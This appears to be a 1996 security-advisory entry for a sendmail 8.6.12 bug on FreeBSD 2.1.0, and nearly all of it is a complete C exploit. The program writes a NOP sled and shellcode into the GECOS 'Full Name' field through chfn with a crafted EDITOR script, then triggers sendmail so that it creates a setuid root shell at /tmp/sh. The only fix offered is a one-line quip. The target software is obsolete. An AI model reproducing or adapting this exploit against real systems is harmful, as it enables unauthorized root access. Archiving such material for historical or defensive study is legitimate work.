1st Jan 1996 [SBWID-207]
COMMAND
sendmail
SYSTEMS AFFECTED
FreeBSD running sendmail 8.6.12
PROBLEM
/* This is exploit for sendmail bug (version
8.6.12 for FreeBSD 2.1.0). */ /* If you have any problems with it, send
letter to me. */ /* Have
fun ! */
/* ----------------- Dedicated to my beautiful lady ------------------
*/ /* Leshka Zakharoff, 1996. E-mail: [email protected]
*/
#include <stdio.h> main() { void make_files();
make_files();
system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;
echo See result in /tmp"); }
void make_files()
{
int i,j;
FILE *f;
char nop_string[200];
char code_string[]=
{
"\xeb\x50" /* jmp cont */
/* geteip: */ "\x5d" /* popl %ebp
*/
"\x55" /* pushl %ebp */
"\xff\x8d\xc3\xff\xff\xff" /* decl 0xffffffc
3(%ebp) */
"\xff\x8d\xd7\xff\xff\xff" /* decl 0xffffffd
7(%ebp) */
"\xc3" /* ret */
/* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp" /* 0xffffffc3(%ebp): */
"\x3c"
"chmod a=rsx /tmp/sh"
/* 0xffffffd7(%ebp): */ "\x01"
"-leshka-leshka-leshka-leshka-" /* reserved */
/* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl $0xefbfcf7
0,%esp */
"\xe8\xa5\xff\xff\xff" /* call geteip */
"\x81\xc5\xb4\xff\xff\xff" /* addl $0xb4fffff
f,%ebp */
"\x55" /* pushl %ebp */
"\x55" /* pushl %ebp */
"\x68\xd0\x77\x04\x08" /* pushl $0x80477d0
*/
"\xc3" /* ret */
"-leshka-leshka-leshka-leshka-" /* reserved */
"\xa0\xcf\xbf\xef"
};
j=269-sizeof(code_string);
for(i=0;i<j;nop_string[i++]='\x90');
nop_string[j]='\0';
f=fopen("user.inf","w");
fprintf(f,"#Changing user database information for leshka\n");
fprintf(f,"Shell: /usr/local/bin/bash\n");
fprintf(f,"Location: \n");
fprintf(f,"Office Phone: \n");
fprintf(f,"Home Phone: \n");
fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
fclose(f);
f=fopen("hack","w");
fprintf(f,"cat user.inf>\"$1\"\n");
fprintf(f,"touch -t 2510711313 \"$1\"\n");
fclose(f);
}
SOLUTION
Get new sendmail (every week or so :-)).